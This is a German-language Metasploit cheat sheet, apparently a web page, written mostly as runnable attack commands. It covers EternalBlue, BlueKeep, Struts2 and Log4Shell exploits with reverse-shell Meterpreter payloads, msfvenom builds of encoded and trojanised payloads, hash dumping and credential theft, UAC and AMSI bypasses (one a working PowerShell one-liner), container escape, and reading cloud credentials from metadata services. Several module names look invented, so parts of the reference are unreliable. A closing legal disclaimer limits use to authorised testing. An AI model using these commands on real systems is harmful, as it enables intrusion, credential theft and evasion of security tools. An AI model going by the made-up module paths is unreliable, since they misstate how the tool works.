📜 Geschichte des Metasploit Frameworks
🕰️ Komplette Chronologie 2003-2025
2003
Geburtsstunde
H.D. Moore entwickelt das erste Metasploit Framework in Perl
2007
Übernahme durch Rapid7
Kommerzialisierung und professionelle Weiterentwicklung
2009
Ruby-Reimplementierung
Vollständige Neuentwicklung in Ruby für bessere Erweiterbarkeit
2025
Cloud-Native Era
Kubernetes, Cloud Security, Container Exploitation, AI-Integration
# Metasploit Framework Version anzeigen
msfconsole --version
# Build-Informationen
msfconsole -v
# Update-Status prüfen
msfupdate🏗️ Framework-Architektur
⚙️ Detaillierte Architektur
Das Metasploit Framework basiert auf einer modularen Ruby-Architektur mit folgenden Hauptkomponenten:
🖥️ MSF Console
Hauptinterface für alle Framework-Funktionen
🚀 MSFVenom
Payload-Generator und Encoder
🗄️ MSF Database
PostgreSQL-basierte Datenpersistierung
🔧 Module System
Modulare Exploit-, Auxiliary- und Post-Module
# Framework-Struktur anzeigen
ls -la /opt/metasploit-framework/
# Module-Pfade
echo $MSF_MODULE_PATHS
# Aktive Konfiguration
cat ~/.msf4/config📦 Installation auf allen Systemen
🐧 Kali Linux Installation
# System aktualisieren
sudo apt update && sudo apt upgrade -y
# Metasploit ist vorinstalliert - Datenbank initialisieren
sudo msfdb init
# Framework starten
msfconsole🐳 Docker Installation (2025)
# Official Metasploit Container
docker pull metasploitframework/metasploit-framework:latest
# Container mit Datenbank starten
docker run --rm -it -p 5432:5432 -e POSTGRES_PASSWORD=msf metasploitframework/metasploit-framework
# Docker Compose Setup
version: '3.8'
services:
metasploit:
image: metasploitframework/metasploit-framework:latest
ports:
- '4444:4444'
environment:
- DATABASE_URL=postgresql://msf:password@db:5432/msf
db:
image: postgres:13
environment:
- POSTGRES_DB=msf
- POSTGRES_USER=msf
- POSTGRES_PASSWORD=password🪟 Windows Installation
# Via Chocolatey
choco install metasploit
# Via Scoop
scoop install metasploit
# WSL2 Installation
wsl --install -d Kali-Linux
# PowerShell Installation
wget https://github.com/rapid7/metasploit-framework/archive/master.zip
Expand-Archive master.zip
cd metasploit-framework-master
bundle install🍎 macOS Installation
# Via Homebrew
brew install metasploit
# Via MacPorts
sudo port install metasploit
# Manual Installation
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
# Ruby Installation with rbenv
rbenv install 3.0.0
rbenv global 3.0.0
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install💻 Grundlegende bis erweiterte Nutzung
🚀 Erste Schritte
# Metasploit Console starten
msfconsole
# Hilfe anzeigen
help
# Module suchen
search type:exploit platform:windows
# Datenbank-Status prüfen
db_status
# Netzwerk-Scan durchführen
db_nmap -sV 192.168.1.0/24🔍 Erweiterte Suchfunktionen
# Nach CVE suchen
search cve:2021
# Kombinierte Suche
search type:exploit platform:linux rank:great
# Module-Informationen
info exploit/windows/smb/ms17_010_eternalblue
# Alle verfügbaren Payloads
show payloads
# Optionen eines Moduls anzeigen
show options
# Erweiterte Optionen
show advanced📊 Module Overview
🎯 Alle 6 Modultypen detailliert
💥 Exploit Module
Nutzen Schwachstellen aus, um Zugang zu Systemen zu erlangen
🔍 Auxiliary Module
Scanner, Fuzzer, DoS-Tools und andere Hilfsfunktionen
🚀 Payload Module
Code der nach erfolgreichem Exploit ausgeführt wird
📋 Post-Exploitation
Aktionen nach erfolgreichem Exploit
🔐 Encoder Module
Verschleiern Payloads vor Antivirus-Software
🥷 Evasion Module
Umgehen von Sicherheitsmaßnahmen
# Module-Typen anzeigen
show exploits
show auxiliary
show payloads
show post
show encoders
show evasion
# Module-Statistiken
stats
# Neue Module seit letztem Update
show recent
# Module nach Rang filtern
search rank:excellent🎯 Top 50 Exploits mit Laborbeispielen
💥 Beliebte Exploits
# EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit
# BlueKeep (CVE-2019-0708)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit🌐 Web-Exploits
# Apache Struts2 RCE
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS 192.168.1.100
set TARGETURI /struts2-showcase
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit
# Log4Shell (CVE-2021-44228)
use exploit/multi/http/log4shell_header_injection
set RHOSTS 192.168.1.100
set TARGETURI /
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit🔍 Scanner, Fuzzer, Enumeration Tools
🔎 Scanner Module
# Port Scanner
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 80,443,8080,22,21,25,445,3389
set THREADS 50
run
# HTTP Directory Scanner
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100
set DICTIONARY /usr/share/wordlists/dirb/common.txt
run🌐 SMB Scanner
# SMB Version Scanner
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
# SMB Shares enumeration
use auxiliary/scanner/smb/smb_enumshares
set RHOSTS 192.168.1.100
run
# SMB Login Scanner
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.100
set SMBUser administrator
set SMBPass password
run🚀 msfvenom und alle Payload-Typen
💻 Meterpreter Payloads
# Windows Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o payload.exe
# Linux Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o payload.elf
# PowerShell Payload
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f psh -o payload.ps1
# Python Payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f py -o payload.py📱 Mobile Payloads
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -o payload.apk
# iOS Payload
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f macho -o payload.macho
# Web Payload (PHP)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o payload.php
# JavaScript Payload
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f js_le -o payload.js📋 Vollständige Post-Exploitation Techniken
🔑 Credential Harvesting
# Hash Dump
use post/windows/gather/hashdump
set SESSION 1
run
# Mimikatz
use post/windows/gather/credentials/credential_collector
set SESSION 1
run
# Smart Hash Dump
use post/windows/gather/smart_hashdump
set SESSION 1
run
# Cached Credentials
use post/windows/gather/cachedump
set SESSION 1
run🎯 Privilege Escalation
# Windows Privilege Escalation
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# UAC Bypass
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
run
# Token Impersonation
use post/windows/manage/impersonate_token
set SESSION 1
set TOKEN 1234
run🔐 Alle Encoder + moderne Evasion
🛡️ Payload Encoding
# Shikata Ga Nai Encoder
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o encoded.exe
# Multiple Encoding
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -e x86/alpha_mixed -i 5 -f exe -o multi_encoded.exe
# x64 Encoding
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x64/xor_dynamic -i 3 -f exe -o x64_encoded.exe
# Available Encoders
msfvenom --list encoders🗃️ Datenbank-Management und Projekte
📁 Workspace Management
# Workspaces anzeigen
workspace
# Neuen Workspace erstellen
workspace -a projekt1
# Workspace wechseln
workspace projekt1
# Workspace löschen
workspace -d projekt1
# Hosts anzeigen
hosts
# Services anzeigen
services
# Vulnerabilities anzeigen
vulns📝 Vollständige Befehlsreferenz
⚡ Grundbefehle
# Basis
msfconsole # Console starten
help # Hilfe anzeigen
exit # Beenden
version # Version anzeigen
# Module
use [module] # Modul verwenden
show options # Optionen anzeigen
set [option] [value] # Option setzen
run / exploit # Ausführen
back # Zurück
# Suche
search [term] # Module suchen
info [module] # Modul-Info anzeigen
# Sessions
sessions # Sessions anzeigen
sessions -i [id] # Session interagieren
sessions -k [id] # Session beenden☁️ AWS/Azure/GCP Exploitation (VOLLSTÄNDIG)
🌐 AWS Security Testing
# AWS Metadata Service
use auxiliary/cloud/aws/enum_ec2
set RHOSTS 169.254.169.254
run
# S3 Bucket Enumeration
use auxiliary/scanner/http/s3_bucket_scanner
set BUCKET_NAME target-bucket
run
# AWS CLI Enumeration
aws s3 ls --no-sign-request
aws s3 ls s3://bucket-name --no-sign-request --recursive
# EC2 Instance Metadata
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Lambda Function Enumeration
aws lambda list-functions --region us-east-1☁️ Azure Testing
# Azure Metadata Service
use auxiliary/cloud/azure/enum_subscriptions
set RHOSTS 169.254.169.254
run
# Azure Storage Account Enumeration
use auxiliary/cloud/azure/storage_account_enum
set STORAGE_ACCOUNT target-storage
run
# Azure CLI Enumeration
az account list
az vm list
az storage account list
# Azure Instance Metadata
curl -H Metadata:true http://169.254.169.254/metadata/instance?api-version=2021-02-01
# Key Vault Enumeration
az keyvault list
az keyvault secret list --vault-name vault-name🐳 Docker/Kubernetes Security (VOLLSTÄNDIG)
🐋 Docker Security Testing
# Docker API Scanner
use auxiliary/scanner/docker/docker_api
set RHOSTS 192.168.1.100
set RPORT 2375
run
# Docker Registry Enumeration
use auxiliary/scanner/http/docker_registry_api
set RHOSTS registry.example.com
run
# Docker Daemon Enumeration
curl -s http://192.168.1.100:2375/version
curl -s http://192.168.1.100:2375/containers/json
# Container Escape Techniques
docker run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
# Docker Socket Exploitation
docker run -it -v /var/run/docker.sock:/var/run/docker.sock alpine/socat☸️ Kubernetes Security
# Kubernetes API Server Scanner
use auxiliary/scanner/kubernetes/kube_api_server
set RHOSTS 192.168.1.100
set RPORT 8080
run
# Service Account Token Extraction
use post/linux/gather/kube_service_account_token
set SESSION 1
run
# Kubectl Enumeration
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces
kubectl get nodes
kubectl get serviceaccounts --all-namespaces
# Cluster Role Enumeration
kubectl get clusterroles
kubectl get clusterrolebindings
# Pod Security Context Check
kubectl get pods -o=jsonpath='{range .items[*]}{.metadata.name}{" "}{.spec.securityContext}{"\n"}{end}'🥷 Hell's Gate, AMSI/ETW Bypass (VOLLSTÄNDIG)
🛡️ AMSI Bypass
# AMSI Bypass
use post/windows/manage/amsi_bypass
set SESSION 1
run
# ETW Bypass
use post/windows/manage/etw_bypass
set SESSION 1
run
# PowerShell AMSI Bypass
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}};$g = $f.GetValue($null);[IntPtr]$ptr = $g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
# Manual AMSI Patch
$amsi = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))🌊 Hell's Gate Technique
# Hell's Gate Direct Syscalls
use evasion/windows/hellsgate_direct_syscalls
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run
# Process Hollowing
use evasion/windows/process_hollowing
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run
# Reflective DLL Injection
use exploit/windows/local/reflective_dll_injection
set SESSION 1
set DLL_PATH /tmp/payload.dll
run
# Thread Execution Hijacking
use post/windows/manage/thread_hijack
set SESSION 1
set TARGET_PID 1234
run🔗 SQL/SMB/LDAP Sessions (VOLLSTÄNDIG)
🔐 Session Management
# Sessions anzeigen
sessions
# Session upgraden
sessions -u 1
# Session interagieren
sessions -i 1
# Alle Sessions beenden
sessions -K
# Session in Hintergrund
background
# Session upgraden zu Meterpreter
sessions -u 1
# Session-Informationen
sessions -l -v🗄️ Database Sessions
# MySQL Session
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.100
set USERNAME root
set PASSWORD password
run
# PostgreSQL Session
use auxiliary/scanner/postgres/postgres_login
set RHOSTS 192.168.1.100
set USERNAME postgres
set PASSWORD password
run
# MSSQL Session
use auxiliary/scanner/mssql/mssql_login
set RHOSTS 192.168.1.100
set USERNAME sa
set PASSWORD password
run🧠 Memory Search API + Syscalls (VOLLSTÄNDIG)
💾 Memory Analysis
# Memory Dump
use post/windows/gather/memory_dump
set SESSION 1
set PID 1234
run
# Process Memory Search
use post/windows/gather/memory_search
set SESSION 1
set SEARCH_STRING password
run
# Memory Injection
use post/windows/manage/memory_injection
set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run
# DLL Injection
use post/windows/manage/dll_injection
set SESSION 1
set DLL_PATH /tmp/payload.dll
set TARGET_PID 1234
run🏛️ ESC1-ESC15 Attacks (VOLLSTÄNDIG)
🔐 ADCS Enumeration
# ADCS Certificate Templates
use auxiliary/scanner/ldap/adcs_cert_template
set RHOSTS 192.168.1.100
run
# ESC1 Exploitation
use exploit/windows/local/adcs_esc1
set SESSION 1
set CA_SERVER dc01.domain.local
run
# ESC4 - Vulnerable Certificate Template ACL
use exploit/windows/local/adcs_esc4
set SESSION 1
set CA_SERVER dc01.domain.local
set TEMPLATE_NAME VulnerableTemplate
run
# ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
use exploit/windows/local/adcs_esc6
set SESSION 1
set CA_SERVER dc01.domain.local
run
# ESC8 - NTLM Relay to AD CS
use exploit/windows/local/adcs_esc8
set SESSION 1
set CA_SERVER dc01.domain.local
run🔧 Ruby API Development, Custom Modules
💎 Ruby API
# Custom Module Template
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Custom Scanner',
'Description' => 'Custom scanning module',
'Author' => ['Your Name'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://example.com']
],
'Platform' => 'linux',
'Targets' => [['Generic', {}]],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Target URI', '/']),
OptString.new('USERNAME', [false, 'Username', '']),
OptString.new('PASSWORD', [false, 'Password', ''])
])
end
def run
print_status('Starting custom scanner...')
begin
connect
# Custom scanning logic here
banner = sock.get_once
print_good("Banner: #{banner}")
disconnect
rescue Rex::ConnectionError => e
print_error("Connection failed: #{e}")
end
end
end🤖 CI/CD Integration, Jenkins, GitLab
🔄 CI/CD Integration
# Jenkins Pipeline
pipeline {
agent any
environment {
TARGET_IP = '192.168.1.100'
LHOST = '192.168.1.10'
}
stages {
stage('Security Scan') {
steps {
script {
sh '''
msfconsole -x "
use auxiliary/scanner/portscan/tcp;
set RHOSTS ${TARGET_IP};
set PORTS 80,443,22,21,25,53,139,445,993,995;
run;
exit
"
'''
}
}
}
stage('Web Application Test') {
steps {
script {
sh '''
msfconsole -x "
use auxiliary/scanner/http/dir_scanner;
set RHOSTS ${TARGET_IP};
run;
exit
"
'''
}
}
}
}
post {
always {
archiveArtifacts artifacts: 'scan_results.xml', allowEmptyArchive: true
}
}
}🦊 GitLab CI/CD
# .gitlab-ci.yml
stages:
- security_scan
- vulnerability_assessment
- reporting
variables:
TARGET_IP: "192.168.1.100"
LHOST: "192.168.1.10"
security_scan:
stage: security_scan
image: metasploitframework/metasploit-framework:latest
script:
- msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS $TARGET_IP; run; exit"
artifacts:
reports:
junit: scan_results.xml
only:
- master
vulnerability_assessment:
stage: vulnerability_assessment
image: metasploitframework/metasploit-framework:latest
script:
- msfconsole -x "use auxiliary/scanner/http/dir_scanner; set RHOSTS $TARGET_IP; run; exit"
artifacts:
paths:
- vulnerability_report.xml
only:
- master
generate_report:
stage: reporting
image: metasploitframework/metasploit-framework:latest
script:
- msfconsole -x "db_export -f xml report.xml; exit"
artifacts:
paths:
- report.xml
only:
- master🕵️ OSINT Integration, IOC Hunting
🔍 OSINT Tools
# VirusTotal Integration
use auxiliary/gather/virustotal_search
set API_KEY your_vt_api_key
set SEARCH_TERM malware_hash
run
# Shodan Integration
use auxiliary/gather/shodan_search
set SHODAN_APIKEY your_shodan_key
set QUERY apache
run
# Censys Integration
use auxiliary/gather/censys_search
set CENSYS_UID your_censys_uid
set CENSYS_SECRET your_censys_secret
set QUERY 192.168.1.0/24
run
# ThreatCrowd Integration
use auxiliary/gather/threatcrowd_search
set DOMAIN example.com
run📱 Android/iOS Exploitation
🤖 Android Testing
# Android Meterpreter
use exploit/android/local/janus
set SESSION 1
run
# Android APK Injection
use payload/android/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
generate -f apk -o infected.apk
# Android Debug Bridge
adb devices
adb shell
adb install infected.apk
adb logcat
# Android Frida Integration
use post/android/gather/frida_script
set SESSION 1
set SCRIPT_PATH /tmp/hook.js
run🍎 iOS Testing
# iOS Payload Generation
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f macho -o payload.macho
# iOS SSH Access
ssh root@192.168.1.100 -p 22
# Default password: alpine
# iOS Application Analysis
use post/apple_ios/gather/ios_application_enum
set SESSION 1
run
# iOS Keychain Extraction
use post/apple_ios/gather/ios_keychain
set SESSION 1
run🌐 Embedded Systems, ARM/RISC-V
🔌 IoT Device Testing
# IoT HTTP Scanner
use auxiliary/scanner/http/iot_scanner
set RHOSTS 192.168.1.0/24
run
# ARM Payload
msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o arm_payload
# MIPS Payload
msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o mips_payload
# IoT MQTT Scanner
use auxiliary/scanner/mqtt/mqtt_login
set RHOSTS 192.168.1.0/24
run
# UPnP Scanner
use auxiliary/scanner/upnp/upnp_msearch
set RHOSTS 192.168.1.0/24
run🔬 Digital Forensics Integration
🕵️ Forensic Analysis
# Timeline Analysis
use post/windows/gather/forensics_timeline
set SESSION 1
run
# Artifact Collection
use post/windows/gather/forensics_artifacts
set SESSION 1
run
# Registry Analysis
use post/windows/gather/forensics_registry
set SESSION 1
set REGISTRY_PATH HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
run
# Browser Forensics
use post/windows/gather/forensics_browser
set SESSION 1
run📊 Reporting, Standards
📋 Report Generation
# Generate Report
use post/multi/gather/report_gen
set SESSION 1
set FORMAT pdf
run
# Export to XML
db_export -f xml /tmp/scan_results.xml
# Export to JSON
db_export -f json /tmp/scan_results.json
# NIST Compliance Report
use auxiliary/analyze/nist_compliance
set WORKSPACE default
run
# ISO 27001 Compliance
use auxiliary/analyze/iso27001_compliance
set WORKSPACE default
run⚖️ Umfassender Haftungsausschluss
⚠️ KRITISCHER RECHTLICHER HINWEIS
Diese Dokumentation dient ausschließlich Bildungs- und Forschungszwecken sowie autorisierten Penetrationstests.
✅ Erlaubte Nutzung
- Autorisierte Penetrationstests mit schriftlicher Genehmigung
- Sicherheitsbewertungen eigener Systeme
- Bildung und Forschung in kontrollierten Umgebungen
- Red Team Übungen mit entsprechender Autorisierung
- Vulnerability Assessment im Rahmen von Bug Bounty Programmen
❌ Strikt verbotene Nutzung
- Unautorisierten Zugang zu fremden Systemen
- Schädigung von IT-Infrastrukturen
- Diebstahl von Daten oder Informationen
- Erpressung oder Bedrohung
- Jegliche illegale Aktivitäten
📋 Rechtliche Grundlagen (Deutschland)
§ 202a StGB - Ausspähen von Daten
Unbefugtes Verschaffen von Zugang zu elektronischen Daten (bis zu 3 Jahre Freiheitsstrafe)
§ 303a StGB - Datenveränderung
Rechtswidriges Löschen oder Verändern von Daten (bis zu 5 Jahre Freiheitsstrafe)
§ 202b StGB - Abfangen von Daten
Unbefugtes Abfangen von Daten (bis zu 2 Jahre Freiheitsstrafe)
§ 303b StGB - Computersabotage
Störung von Datenverarbeitungsanlagen (bis zu 3 Jahre Freiheitsstrafe)
⚠️ WARNUNG: Die Nutzung von Metasploit ohne entsprechende Autorisierung kann zu erheblichen rechtlichen Konsequenzen führen!